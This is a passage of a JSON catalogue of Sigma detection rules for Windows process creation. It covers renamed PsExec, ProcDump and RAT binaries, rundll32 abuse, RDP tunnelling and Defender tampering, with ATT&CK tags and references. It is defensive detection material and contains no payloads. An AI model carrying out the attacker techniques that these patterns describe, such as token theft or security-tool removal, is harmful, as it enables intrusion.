"attack.defense_evasion", - "attack.t1562.010" - ], - 
"creation_date": "2022/03/22", - "filename": "proc_creation_win_reg_lsass_ppl.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", - "value": "Service ImagePath Change with Reg.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.011" - ], - "creation_date": "2021/12/30", - "filename": "proc_creation_win_reg_service_imagepath_change.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. 
This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", - "value": "Potential Remote Desktop Tunneling", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_remote_desktop_tunneling.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", - "value": "Remote File Download via Desktopimgdownldr Utility", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - 
"value": "Remote PowerShell Session Host Process (WinRM)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" - ], - "creation_date": "2019/09/12", - "filename": "proc_creation_win_remote_powershell_session_process.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", - "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", - "value": "Discovery of a System Time", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1124" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_remote_time_discovery.yml", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate use of the system utilities to discover system time for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "value": "Remove Windows Defender Definition Files", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/07", - "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", - "value": "Renamed Binary", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1036/", - "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/06/15", - "filename": 
"proc_creation_win_renamed_binary.yml", - "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", - "level": "medium", - "falsepositive": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", - "value": "Highly Relevant Renamed Binary", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1036/", - "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/06/15", - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", - "author": "Matthew Green - @mgreen27, Florian Roth", - "level": "high", - "falsepositive": [ - "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "value": "Process Creation with Renamed BrowserCore.exe", - "meta": { - "refs": [ - "https://twitter.com/mariuszbit/status/1531631015139102720", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" - ], - "tags": [ - "attack.t1528", - "attack.t1036.003" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_renamed_browsercore.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", - "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", - "value": "Renamed FTP.EXE Binary Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_renamed_ftp.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed jusched.exe used by cobalt group", - "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "value": "Renamed jusched.exe", - "meta": { - "refs": [ - 
"https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/06/04", - "filename": "proc_creation_win_renamed_jusched.yml", - "author": "Markus Neis, Swisscom", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "value": "Rename Mavinject Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" - ], - "creation_date": "2022/12/05", - "filename": 
"proc_creation_win_renamed_mavinject.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", - "value": "Renamed MegaSync", - "meta": { - "refs": [ - "https://redcanary.com/blog/rclone-mega-extortion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/06/22", - "filename": "proc_creation_win_renamed_megasync.yml", - "author": "Sittikorn S", - "level": "high", - "falsepositive": [ - "Software that illegaly integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process creation with a renamed Msdt.exe", - "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "value": "Renamed Msdt.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_win_renamed_msdt.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "uuid": "0afbd410-de03-4078-8491-f132303cb67d", - "value": 
"Execution of Renamed NetSupport RAT", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_renamed_netsupport_rat.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed paexec via imphash and executable product string", - "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", - "value": "Execution of Renamed PaExec", - "meta": { - "refs": [ - "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.g0046", - "car.2013-05-009", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2019/04/17", - "filename": "proc_creation_win_renamed_paexec.yml", - "author": "Jason Lynch", - "level": "medium", - "falsepositive": [ - "Unknown imphashes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execution of a renamed version of the Plink binary", - "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", - "value": "Execution Of Renamed Plink Binary", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2022/06/06", - "filename": "proc_creation_win_renamed_plink.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed PowerShell often used by attackers or malware", - "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", - "value": "Renamed PowerShell", - "meta": { - "refs": [ - "https://twitter.com/christophetd/status/1164506034720952320", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml" - ], - "tags": [ - "car.2013-05-009", - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/08/22", - "filename": "proc_creation_win_renamed_powershell.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "value": "Renamed ProcDump", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/11/18", - "filename": "proc_creation_win_renamed_procdump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Procdump illegaly bundled with legitimate software", - "Weird admins who renamed binaries (and should be investigated)" - ], - "logsource.category": 
"process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed PsExec often used by attackers or malware", - "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", - "value": "Renamed PsExec", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" - ], - "tags": [ - "car.2013-05-009", - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/05/21", - "filename": "proc_creation_win_renamed_psexec.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software that illegaly integrates PsExec in a renamed form", - "Administrators that have renamed PsExec and no one knows why" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection", - "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", - "value": "Renamed Rundll32.exe Execution", - "meta": { - "refs": [ - "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" - ], - "tags": "No established tags", - "creation_date": "2022/06/08", - "filename": "proc_creation_win_renamed_rundll32.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "value": "DllRegisterServer Call From Non Rundll32", - "meta": { - "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", - "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", - "value": "Execution of Renamed Remote Utilities RAT (RURAT)", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_renamed_rurat.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "value": "Renamed Sysinternals Sdelete Usage", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2022/09/06", - "filename": "proc_creation_win_renamed_sdelete.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "System administrator usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", - "value": "Renamed or Portable Vmnat.exe", - "meta": { - "refs": [ - "https://twitter.com/malmoeb/status/1525901219247845376", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_renamed_vmnat.yml", - "author": "elhoim", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "value": "Renamed Whoami Execution", - "meta": { - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2021/08/12", - "filename": "proc_creation_win_renamed_whoami.yml", - 
"author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", - "value": "Root Certificate Installed", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2020/10/10", - "filename": "proc_creation_win_root_certificate_installed.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "medium", - "falsepositive": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "value": "Remote Procedure Call Service Anomaly", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", - "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", - "https://twitter.com/cyb3rops/status/1514217991034097664", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/04/13", - "filename": "proc_creation_win_rpcss_anomalies.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. 
Variant of Raspberry Robin, as first reported by Red Canary.", - "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "value": "Rundll32 With Suspicious Parent Process", - "meta": { - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/05/21", - "filename": "proc_creation_win_rundll32_parent_explorer.yml", - "author": "CD_ROM_", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "load malicious registered COM objects", - "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", - "value": "Rundll32 Registered COM Objects", - "meta": { - "refs": [ - "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_rundll32_registered_com_objects.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "value": "Rundll32 UNC Path Execution", - "meta": { - "refs": [ - "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" - ], - "creation_date": "2022/08/10", - "filename": "proc_creation_win_rundll32_unc_path.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "uuid": "5bb68627-3198-40ca-b458-49f973db8752", - "value": "Rundll32 Without Parameters", - "meta": { - "refs": [ - "https://bczyz1.github.io/2021/01/30/psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2021/01/31", - "filename": "proc_creation_win_rundll32_without_parameters.yml", - "author": "Bartlomiej Czyz, Relativity", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "value": "Rundll32 Execution Without DLL File", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1481630810495139841?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/13", - "filename": "proc_creation_win_run_executable_invalid_extension.yml", - "author": "Tim Shelton, Florian Roth, Yassine Oukessou 
(fix + fp)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", - "uuid": "1a70042a-6622-4a2b-8958-267625349abf", - "value": "Run from a Zip File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_run_from_zip.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "value": "Run PowerShell Script from ADS", - "meta": { - "refs": [ - "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2019/10/30", - "filename": "proc_creation_win_run_powershell_script_from_ads.yml", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell script execution via input stream redirect", - "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "value": "Run PowerShell Script from Redirected Input Stream", - "meta": { - 
